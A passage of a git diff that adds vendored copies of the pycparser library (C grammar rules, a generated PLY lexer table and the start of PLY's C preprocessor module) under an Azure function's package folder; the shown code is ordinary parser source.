precedence/associativity specification feature + # of PLY. (see precedence declaration above) + # + def p_assignment_operator(self, p): + """ assignment_operator : EQUALS + | XOREQUAL + | TIMESEQUAL + | DIVEQUAL + | MODEQUAL + | PLUSEQUAL + | MINUSEQUAL + | LSHIFTEQUAL + | RSHIFTEQUAL + | ANDEQUAL + | OREQUAL + """ + p[0] = p[1] + + def p_constant_expression(self, p): + """ constant_expression : conditional_expression """ + p[0] = p[1] + + def p_conditional_expression(self, p): + """ conditional_expression : binary_expression + | binary_expression CONDOP expression COLON conditional_expression + """ + if len(p) == 2: + p[0] = p[1] + else: + p[0] = c_ast.TernaryOp(p[1], p[3], p[5], p[1].coord) + + def p_binary_expression(self, p): + """ binary_expression : cast_expression + | binary_expression TIMES binary_expression + | binary_expression DIVIDE binary_expression + | binary_expression MOD binary_expression + | binary_expression PLUS binary_expression + | binary_expression MINUS binary_expression + | binary_expression RSHIFT binary_expression + | binary_expression LSHIFT binary_expression + | binary_expression LT binary_expression + | binary_expression LE binary_expression + | binary_expression GE binary_expression + | binary_expression GT binary_expression + | binary_expression EQ binary_expression + | binary_expression NE binary_expression + | binary_expression AND binary_expression + | binary_expression OR binary_expression + | binary_expression XOR binary_expression + | binary_expression LAND binary_expression + | binary_expression LOR binary_expression + """ + if len(p) == 2: + p[0] = p[1] + else: + p[0] = c_ast.BinaryOp(p[2], p[1], p[3], p[1].coord) + + def p_cast_expression_1(self, p): + """ cast_expression : unary_expression """ + p[0] = p[1] + + def p_cast_expression_2(self, p): + """ cast_expression : LPAREN type_name RPAREN cast_expression """ + p[0] = c_ast.Cast(p[2], p[4], self._token_coord(p, 1)) + + def p_unary_expression_1(self, p): + """ unary_expression : postfix_expression """ + p[0] = p[1] + + def p_unary_expression_2(self, p): + """ unary_expression : PLUSPLUS unary_expression + | MINUSMINUS unary_expression + | unary_operator cast_expression + """ + p[0] = c_ast.UnaryOp(p[1], p[2], p[2].coord) + + def p_unary_expression_3(self, p): + """ unary_expression : SIZEOF unary_expression + | SIZEOF LPAREN type_name RPAREN + | _ALIGNOF LPAREN type_name RPAREN + """ + p[0] = c_ast.UnaryOp( + p[1], + p[2] if len(p) == 3 else p[3], + self._token_coord(p, 1)) + + def p_unary_operator(self, p): + """ unary_operator : AND + | TIMES + | PLUS + | MINUS + | NOT + | LNOT + """ + p[0] = p[1] + + def p_postfix_expression_1(self, p): + """ postfix_expression : primary_expression """ + p[0] = p[1] + + def p_postfix_expression_2(self, p): + """ postfix_expression : postfix_expression LBRACKET expression RBRACKET """ + p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord) + + def p_postfix_expression_3(self, p): + """ postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN + | postfix_expression LPAREN RPAREN + """ + p[0] = c_ast.FuncCall(p[1], p[3] if len(p) == 5 else None, p[1].coord) + + def p_postfix_expression_4(self, p): + """ postfix_expression : postfix_expression PERIOD ID + | postfix_expression PERIOD TYPEID + | postfix_expression ARROW ID + | postfix_expression ARROW TYPEID + """ + field = c_ast.ID(p[3], self._token_coord(p, 3)) + p[0] = c_ast.StructRef(p[1], p[2], field, p[1].coord) + + def p_postfix_expression_5(self, p): + """ postfix_expression : postfix_expression PLUSPLUS + | postfix_expression MINUSMINUS + """ + p[0] = c_ast.UnaryOp('p' + p[2], p[1], p[1].coord) + + def p_postfix_expression_6(self, p): + """ postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close + | LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close + """ + p[0] = c_ast.CompoundLiteral(p[2], p[5]) + + def p_primary_expression_1(self, p): + """ primary_expression : identifier """ + p[0] = p[1] + + def p_primary_expression_2(self, p): + """ primary_expression : constant """ + p[0] = p[1] + + def p_primary_expression_3(self, p): + """ primary_expression : unified_string_literal + | unified_wstring_literal + """ + p[0] = p[1] + + def p_primary_expression_4(self, p): + """ primary_expression : LPAREN expression RPAREN """ + p[0] = p[2] + + def p_primary_expression_5(self, p): + """ primary_expression : OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN + """ + coord = self._token_coord(p, 1) + p[0] = c_ast.FuncCall(c_ast.ID(p[1], coord), + c_ast.ExprList([p[3], p[5]], coord), + coord) + + def p_offsetof_member_designator(self, p): + """ offsetof_member_designator : identifier + | offsetof_member_designator PERIOD identifier + | offsetof_member_designator LBRACKET expression RBRACKET + """ + if len(p) == 2: + p[0] = p[1] + elif len(p) == 4: + p[0] = c_ast.StructRef(p[1], p[2], p[3], p[1].coord) + elif len(p) == 5: + p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord) + else: + raise NotImplementedError("Unexpected parsing state. len(p): %u" % len(p)) + + def p_argument_expression_list(self, p): + """ argument_expression_list : assignment_expression + | argument_expression_list COMMA assignment_expression + """ + if len(p) == 2: # single expr + p[0] = c_ast.ExprList([p[1]], p[1].coord) + else: + p[1].exprs.append(p[3]) + p[0] = p[1] + + def p_identifier(self, p): + """ identifier : ID """ + p[0] = c_ast.ID(p[1], self._token_coord(p, 1)) + + def p_constant_1(self, p): + """ constant : INT_CONST_DEC + | INT_CONST_OCT + | INT_CONST_HEX + | INT_CONST_BIN + | INT_CONST_CHAR + """ + uCount = 0 + lCount = 0 + for x in p[1][-3:]: + if x in ('l', 'L'): + lCount += 1 + elif x in ('u', 'U'): + uCount += 1 + t = '' + if uCount > 1: + raise ValueError('Constant cannot have more than one u/U suffix.') + elif lCount > 2: + raise ValueError('Constant cannot have more than two l/L suffix.') + prefix = 'unsigned ' * uCount + 'long ' * lCount + p[0] = c_ast.Constant( + prefix + 'int', p[1], self._token_coord(p, 1)) + + def p_constant_2(self, p): + """ constant : FLOAT_CONST + | HEX_FLOAT_CONST + """ + if 'x' in p[1].lower(): + t = 'float' + else: + if p[1][-1] in ('f', 'F'): + t = 'float' + elif p[1][-1] in ('l', 'L'): + t = 'long double' + else: + t = 'double' + + p[0] = c_ast.Constant( + t, p[1], self._token_coord(p, 1)) + + def p_constant_3(self, p): + """ constant : CHAR_CONST + | WCHAR_CONST + | U8CHAR_CONST + | U16CHAR_CONST + | U32CHAR_CONST + """ + p[0] = c_ast.Constant( + 'char', p[1], self._token_coord(p, 1)) + + # The "unified" string and wstring literal rules are for supporting + # concatenation of adjacent string literals. + # I.e. "hello " "world" is seen by the C compiler as a single string literal + # with the value "hello world" + # + def p_unified_string_literal(self, p): + """ unified_string_literal : STRING_LITERAL + | unified_string_literal STRING_LITERAL + """ + if len(p) == 2: # single literal + p[0] = c_ast.Constant( + 'string', p[1], self._token_coord(p, 1)) + else: + p[1].value = p[1].value[:-1] + p[2][1:] + p[0] = p[1] + + def p_unified_wstring_literal(self, p): + """ unified_wstring_literal : WSTRING_LITERAL + | U8STRING_LITERAL + | U16STRING_LITERAL + | U32STRING_LITERAL + | unified_wstring_literal WSTRING_LITERAL + | unified_wstring_literal U8STRING_LITERAL + | unified_wstring_literal U16STRING_LITERAL + | unified_wstring_literal U32STRING_LITERAL + """ + if len(p) == 2: # single literal + p[0] = c_ast.Constant( + 'string', p[1], self._token_coord(p, 1)) + else: + p[1].value = p[1].value.rstrip()[:-1] + p[2][2:] + p[0] = p[1] + + def p_brace_open(self, p): + """ brace_open : LBRACE + """ + p[0] = p[1] + p.set_lineno(0, p.lineno(1)) + + def p_brace_close(self, p): + """ brace_close : RBRACE + """ + p[0] = p[1] + p.set_lineno(0, p.lineno(1)) + + def p_empty(self, p): + 'empty : ' + p[0] = None + + def p_error(self, p): + # If error recovery is added here in the future, make sure + # _get_yacc_lookahead_token still works! + # + if p: + self._parse_error( + 'before: %s' % p.value, + self._coord(lineno=p.lineno, + column=self.clex.find_tok_column(p))) + else: + self._parse_error('At end of input', self.clex.filename) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/lextab.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/lextab.py new file mode 100644 index 0000000..7858983 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/lextab.py @@ -0,0 +1,10 @@ +# lextab.py. This file automatically created by PLY (version 3.10). Don't edit! +_tabversion = '3.10' +_lextokens = set(('INT_CONST_CHAR', 'VOID', 'LBRACKET', 'WCHAR_CONST', 'FLOAT_CONST', 'MINUS', 'RPAREN', 'STRUCT', 'LONG', 'PLUS', 'ELLIPSIS', 'U32STRING_LITERAL', 'GT', 'GOTO', 'ENUM', 'PERIOD', 'GE', 'INT_CONST_DEC', 'ARROW', '_STATIC_ASSERT', '__INT128', 'HEX_FLOAT_CONST', 'DOUBLE', 'MINUSEQUAL', 'INT_CONST_OCT', 'TIMESEQUAL', 'OR', 'SHORT', 'RETURN', 'RSHIFTEQUAL', '_ALIGNAS', 'RESTRICT', 'STATIC', 'SIZEOF', 'UNSIGNED', 'PLUSPLUS', 'COLON', 'WSTRING_LITERAL', 'DIVIDE', 'FOR', 'UNION', 'EQUALS', 'ELSE', 'ANDEQUAL', 'EQ', 'AND', 'TYPEID', 'LBRACE', 'PPHASH', 'INT', 'SIGNED', 'CONTINUE', 'NOT', 'OREQUAL', 'MOD', 'RSHIFT', 'DEFAULT', '_NORETURN', 'CHAR', 'WHILE', 'DIVEQUAL', '_ALIGNOF', 'EXTERN', 'LNOT', 'CASE', 'LAND', 'REGISTER', 'MODEQUAL', 'NE', 'SWITCH', 'INT_CONST_HEX', '_COMPLEX', 'PPPRAGMASTR', 'PLUSEQUAL', 'U32CHAR_CONST', 'CONDOP', 'U8STRING_LITERAL', 'BREAK', 'VOLATILE', 'PPPRAGMA', 'INLINE', 'INT_CONST_BIN', 'DO', 'U8CHAR_CONST', 'CONST', 'U16STRING_LITERAL', 'LOR', 'CHAR_CONST', 'LSHIFT', 'RBRACE', '_BOOL', 'LE', 'SEMI', '_THREAD_LOCAL', 'LT', 'COMMA', 'U16CHAR_CONST', 'OFFSETOF', '_ATOMIC', 'TYPEDEF', 'XOR', 'AUTO', 'TIMES', 'LPAREN', 'MINUSMINUS', 'ID', 'IF', 'STRING_LITERAL', 'FLOAT', 'XOREQUAL', 'LSHIFTEQUAL', 'RBRACKET')) +_lexreflags = 64 +_lexliterals = '' +_lexstateinfo = {'ppline': 'exclusive', 'pppragma': 'exclusive', 'INITIAL': 'inclusive'} +_lexstatere = {'ppline': [('(?P"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?P(0(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)|([1-9][0-9]*(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?))|(?P\\n)|(?Pline)', [None, ('t_ppline_FILENAME', 'FILENAME'), None, None, ('t_ppline_LINE_NUMBER', 'LINE_NUMBER'), None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, ('t_ppline_NEWLINE', 'NEWLINE'), ('t_ppline_PPLINE', 'PPLINE')])], 'pppragma': [('(?P\\n)|(?Ppragma)|(?P.+)', [None, ('t_pppragma_NEWLINE', 'NEWLINE'), ('t_pppragma_PPPRAGMA', 'PPPRAGMA'), ('t_pppragma_STR', 'STR')])], 'INITIAL': [('(?P[ \\t]*\\#)|(?P\\n+)|(?P\\{)|(?P\\})|(?P((((([0-9]*\\.[0-9]+)|([0-9]+\\.))([eE][-+]?[0-9]+)?)|([0-9]+([eE][-+]?[0-9]+)))[FfLl]?))|(?P(0[xX]([0-9a-fA-F]+|((([0-9a-fA-F]+)?\\.[0-9a-fA-F]+)|([0-9a-fA-F]+\\.)))([pP][+-]?[0-9]+)[FfLl]?))|(?P0[xX][0-9a-fA-F]+(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)|(?P0[bB][01]+(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)', [None, ('t_PPHASH', 'PPHASH'), ('t_NEWLINE', 'NEWLINE'), ('t_LBRACE', 'LBRACE'), ('t_RBRACE', 'RBRACE'), ('t_FLOAT_CONST', 'FLOAT_CONST'), None, None, None, None, None, None, None, None, None, ('t_HEX_FLOAT_CONST', 'HEX_FLOAT_CONST'), None, None, None, None, None, None, None, ('t_INT_CONST_HEX', 'INT_CONST_HEX'), None, None, None, None, None, None, None, ('t_INT_CONST_BIN', 'INT_CONST_BIN')]), ('(?P0[0-7]*[89])|(?P0[0-7]*(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)|(?P(0(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)|([1-9][0-9]*(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?))|(?P\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F])))){2,4}\')|(?P\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')|(?PL\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')|(?Pu8\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')|(?Pu\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')|(?PU\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')', [None, ('t_BAD_CONST_OCT', 'BAD_CONST_OCT'), ('t_INT_CONST_OCT', 'INT_CONST_OCT'), None, None, None, None, None, None, None, ('t_INT_CONST_DEC', 'INT_CONST_DEC'), None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, ('t_INT_CONST_CHAR', 'INT_CONST_CHAR'), None, None, None, None, None, None, ('t_CHAR_CONST', 'CHAR_CONST'), None, None, None, None, None, None, ('t_WCHAR_CONST', 'WCHAR_CONST'), None, None, None, None, None, None, ('t_U8CHAR_CONST', 'U8CHAR_CONST'), None, None, None, None, None, None, ('t_U16CHAR_CONST', 'U16CHAR_CONST'), None, None, None, None, None, None, ('t_U32CHAR_CONST', 'U32CHAR_CONST')]), ('(?P(\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))*\\n)|(\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))*$))|(?P(\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))[^\'\n]+\')|(\'\')|(\'([\\\\][^a-zA-Z._~^!=&\\^\\-\\\\?\'"x0-9])[^\'\\n]*\'))|(?PL"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?Pu8"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?Pu"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?PU"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?P"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*([\\\\][^a-zA-Z._~^!=&\\^\\-\\\\?\'"x0-9])([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?P[a-zA-Z_$][0-9a-zA-Z_$]*)|(?P"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?P\\.\\.\\.)|(?P\\+\\+)|(?P\\|\\|)|(?P\\^=)|(?P\\|=)|(?P<<=)|(?P>>=)|(?P\\+=)|(?P\\*=)', [None, ('t_UNMATCHED_QUOTE', 'UNMATCHED_QUOTE'), None, None, None, None, None, None, None, None, None, None, None, None, None, None, ('t_BAD_CHAR_CONST', 'BAD_CHAR_CONST'), None, None, None, None, None, None, None, None, None, None, ('t_WSTRING_LITERAL', 'WSTRING_LITERAL'), None, None, ('t_U8STRING_LITERAL', 'U8STRING_LITERAL'), None, None, ('t_U16STRING_LITERAL', 'U16STRING_LITERAL'), None, None, ('t_U32STRING_LITERAL', 'U32STRING_LITERAL'), None, None, ('t_BAD_STRING_LITERAL', 'BAD_STRING_LITERAL'), None, None, None, None, None, ('t_ID', 'ID'), (None, 'STRING_LITERAL'), None, None, (None, 'ELLIPSIS'), (None, 'PLUSPLUS'), (None, 'LOR'), (None, 'XOREQUAL'), (None, 'OREQUAL'), (None, 'LSHIFTEQUAL'), (None, 'RSHIFTEQUAL'), (None, 'PLUSEQUAL'), (None, 'TIMESEQUAL')]), ('(?P\\+)|(?P%=)|(?P/=)|(?P\\])|(?P\\?)|(?P\\^)|(?P<<)|(?P<=)|(?P\\()|(?P->)|(?P==)|(?P!=)|(?P--)|(?P\\|)|(?P\\*)|(?P\\[)|(?P>=)|(?P\\))|(?P&&)|(?P>>)|(?P-=)|(?P\\.)|(?P&=)|(?P=)|(?P<)|(?P,)|(?P/)|(?P&)|(?P%)|(?P;)|(?P-)|(?P>)|(?P:)|(?P~)|(?P!)', [None, (None, 'PLUS'), (None, 'MODEQUAL'), (None, 'DIVEQUAL'), (None, 'RBRACKET'), (None, 'CONDOP'), (None, 'XOR'), (None, 'LSHIFT'), (None, 'LE'), (None, 'LPAREN'), (None, 'ARROW'), (None, 'EQ'), (None, 'NE'), (None, 'MINUSMINUS'), (None, 'OR'), (None, 'TIMES'), (None, 'LBRACKET'), (None, 'GE'), (None, 'RPAREN'), (None, 'LAND'), (None, 'RSHIFT'), (None, 'MINUSEQUAL'), (None, 'PERIOD'), (None, 'ANDEQUAL'), (None, 'EQUALS'), (None, 'LT'), (None, 'COMMA'), (None, 'DIVIDE'), (None, 'AND'), (None, 'MOD'), (None, 'SEMI'), (None, 'MINUS'), (None, 'GT'), (None, 'COLON'), (None, 'NOT'), (None, 'LNOT')])]} +_lexstateignore = {'ppline': ' \t', 'pppragma': ' \t', 'INITIAL': ' \t'} +_lexstateerrorf = {'ppline': 't_ppline_error', 'pppragma': 't_pppragma_error', 'INITIAL': 't_error'} +_lexstateeoff = {} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__init__.py new file mode 100644 index 0000000..86aa2b8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__init__.py @@ -0,0 +1,5 @@ +# PLY package +# Author: David Beazley (dave@dabeaz.com) + +__version__ = '3.9' +__all__ = ['lex','yacc'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..63ec6d9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/cpp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/cpp.cpython-39.pyc new file mode 100644 index 0000000..390f15e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/cpp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ctokens.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ctokens.cpython-39.pyc new file mode 100644 index 0000000..6058386 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ctokens.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/lex.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/lex.cpython-39.pyc new file mode 100644 index 0000000..4fb334e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/lex.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/yacc.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/yacc.cpython-39.pyc new file mode 100644 index 0000000..105f10b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/yacc.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ygen.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ygen.cpython-39.pyc new file mode 100644 index 0000000..75d64b6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ygen.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/cpp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/cpp.py new file mode 100644 index 0000000..7c1c288 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/cpp.py @@ -0,0 +1,905 @@ +# ----------------------------------------------------------------------------- +# cpp.py +# +# Author: David Beazley (http://www.dabeaz.com) +# Copyright (C) 2017 +# All rights reserved +# +# This module implements an ANSI-C style lexical preprocessor for PLY. +# ----------------------------------------------------------------------------- +import sys + +# Some Python 3 compatibility shims +if sys.version_info.major < 3: + STRING_TYPES = (str, unicode) +else: + STRING_TYPES = str + xrange = range + +# ----------------------------------------------------------------------------- +# Default preprocessor lexer definitions. These tokens are enough to get +# a basic preprocessor working. Other modules may import these if they want +# ----------------------------------------------------------------------------- + +tokens = ( + 'CPP_ID','CPP_INTEGER', 'CPP_FLOAT', 'CPP_STRING', 'CPP_CHAR', 'CPP_WS', 'CPP_COMMENT1', 'CPP_COMMENT2', 'CPP_POUND','CPP_DPOUND' +) + +literals = "+-*/%|&~^<>=!?()[]{}.,;:\\\'\"" + +# Whitespace +def t_CPP_WS(t): + r'\s+' + t.lexer.lineno += t.value.count("\n") + return t + +t_CPP_POUND = r'\#' +t_CPP_DPOUND = r'\#\#' + +# Identifier +t_CPP_ID = r'[A-Za-z_][\w_]*' + +# Integer literal +def CPP_INTEGER(t): + r'(((((0x)|(0X))[0-9a-fA-F]+)|(\d+))([uU][lL]|[lL][uU]|[uU]|[lL])?)' + return t + +t_CPP_INTEGER = CPP_INTEGER + +# Floating literal +t_CPP_FLOAT = r'((\d+)(\.\d+)(e(\+|-)?(\d+))? | (\d+)e(\+|-)?(\d+))([lL]|[fF])?' + +# String literal +def t_CPP_STRING(t): + r'\"([^\\\n]|(\\(.|\n)))*?\"' + t.lexer.lineno += t.value.count("\n") + return t + +# Character constant 'c' or L'c' +def t_CPP_CHAR(t): + r'(L)?\'([^\\\n]|(\\(.|\n)))*?\'' + t.lexer.lineno += t.value.count("\n") + return t + +# Comment +def t_CPP_COMMENT1(t): + r'(/\*(.|\n)*?\*/)' + ncr = t.value.count("\n") + t.lexer.lineno += ncr + # replace with one space or a number of '\n' + t.type = 'CPP_WS'; t.value = '\n' * ncr if ncr else ' ' + return t + +# Line comment +def t_CPP_COMMENT2(t): + r'(//.*?(\n|$))' + # replace with '/n' + t.type = 'CPP_WS'; t.value = '\n' + return t + +def t_error(t): + t.type = t.value[0] + t.value = t.value[0] + t.lexer.skip(1) + return t + +import re +import copy +import time +import os.path + +# ----------------------------------------------------------------------------- +# trigraph() +# +# Given an input string, this function replaces all trigraph sequences. +# The following mapping is used: +# +# ??= # +# ??/ \ +# ??' ^ +# ??( [ +# ??) ] +# ??! | +# ??< { +# ??> } +# ??- ~ +# ----------------------------------------------------------------------------- + +_trigraph_pat = re.compile(r'''\?\?[=/\'\(\)\!<>\-]''') +_trigraph_rep = { + '=':'#', + '/':'\\', + "'":'^', + '(':'[', + ')':']', + '!':'|', + '<':'{', + '>':'}', + '-':'~' +} + +def trigraph(input): + return _trigraph_pat.sub(lambda g: _trigraph_rep[g.group()[-1]],input) + +# ------------------------------------------------------------------ +# Macro object +# +# This object holds information about preprocessor macros +# +# .name - Macro name (string) +# .value - Macro value (a list of tokens) +# .arglist - List of argument names +# .variadic - Boolean indicating whether or not variadic macro +# .vararg - Name of the variadic parameter +# +# When a macro is created, the macro replacement token sequence is +# pre-scanned and used to create patch lists that are later used +# during macro expansion +# ------------------------------------------------------------------ + +class Macro(object): + def __init__(self,name,value,arglist=None,variadic=False): + self.name = name + self.value = value + self.arglist = arglist + self.variadic = variadic + if variadic: + self.vararg = arglist[-1] + self.source = None + +# ------------------------------------------------------------------ +# Preprocessor object +# +# Object representing a preprocessor. Contains macro definitions, +# include directories, and other information +# ------------------------------------------------------------------ + +class Preprocessor(object): + def __init__(self,lexer=None): + if lexer is None: + lexer = lex.lexer + self.lexer = lexer + self.macros = { } + self.path = [] + self.temp_path = [] + + # Probe the lexer for selected tokens + self.lexprobe() + + tm = time.localtime() + self.define("__DATE__ \"%s\"" % time.strftime("%b %d %Y",tm)) + self.define("__TIME__ \"%s\"" % time.strftime("%H:%M:%S",tm)) + self.parser = None + + # ----------------------------------------------------------------------------- + # tokenize() + # + # Utility function. Given a string of text, tokenize into a list of tokens + # ----------------------------------------------------------------------------- + + def tokenize(self,text): + tokens = [] + self.lexer.input(text) + while True: + tok = self.lexer.token() + if not tok: break + tokens.append(tok) + return tokens + + # --------------------------------------------------------------------- + # error() + # + # Report a preprocessor error/warning of some kind + # ---------------------------------------------------------------------- + + def error(self,file,line,msg): + print("%s:%d %s" % (file,line,msg)) + + # ---------------------------------------------------------------------- + # lexprobe() + # + # This method probes the preprocessor lexer object to discover + # the token types of symbols that are important to the preprocessor. + # If this works right, the preprocessor will simply "work" + # with any suitable lexer regardless of how tokens have been named. + # ---------------------------------------------------------------------- + + def lexprobe(self): + + # Determine the token type for identifiers + self.lexer.input("identifier") + tok = self.lexer.token() + if not tok or tok.value != "identifier": + print("Couldn't determine identifier type") + else: + self.t_ID = tok.type + + # Determine the token type for integers + self.lexer.input("12345") + tok = self.lexer.token() + if not tok or int(tok.value) != 12345: + print("Couldn't determine integer type") + else: + self.t_INTEGER = tok.type + self.t_INTEGER_TYPE = type(tok.value) + + # Determine the token type for strings enclosed in double quotes + self.lexer.input("\"filename\"") + tok = self.lexer.token() + if not tok or tok.value != "\"filename\"": + print("Couldn't determine string type") + else: + self.t_STRING = tok.type + + # Determine the token type for whitespace--if any + self.lexer.input(" ") + tok = self.lexer.token() + if not tok or tok.value != " ": + self.t_SPACE = None + else: + self.t_SPACE = tok.type + + # Determine the token type for newlines + self.lexer.input("\n") + tok = self.lexer.token() + if not tok or tok.value != "\n": + self.t_NEWLINE = None + print("Couldn't determine token for newlines") + else: + self.t_NEWLINE = tok.type + + self.t_WS = (self.t_SPACE, self.t_NEWLINE) + + # Check for other characters used by the preprocessor + chars = [ '<','>','#','##','\\','(',')',',','.'] + for c in chars: + self.lexer.input(c) + tok = self.lexer.token() + if not tok or tok.value != c: + print("Unable to lex '%s' required for preprocessor" % c) + + # ---------------------------------------------------------------------- + # add_path() + # + # Adds a search path to the preprocessor. + # ---------------------------------------------------------------------- + + def add_path(self,path): + self.path.append(path) + + # ---------------------------------------------------------------------- + # group_lines() + # + # Given an input string, this function splits it into lines. Trailing whitespace + # is removed. Any line ending with \ is grouped with the next line. This + # function forms the lowest level of the preprocessor---grouping into text into + # a line-by-line format. + # ---------------------------------------------------------------------- + + def group_lines(self,input): + lex = self.lexer.clone() + lines = [x.rstrip() for x in input.splitlines()] + for i in xrange(len(lines)): + j = i+1 + while lines[i].endswith('\\') and (j < len(lines)): + lines[i] = lines[i][:-1]+lines[j] + lines[j] = "" + j += 1 + + input = "\n".join(lines) + lex.input(input) + lex.lineno = 1 + + current_line = [] + while True: + tok = lex.token() + if not tok: + break + current_line.append(tok) + if tok.type in self.t_WS and '\n' in tok.value: + yield current_line + current_line = [] + + if current_line: + yield current_line + + # ---------------------------------------------------------------------- + # tokenstrip() + # + 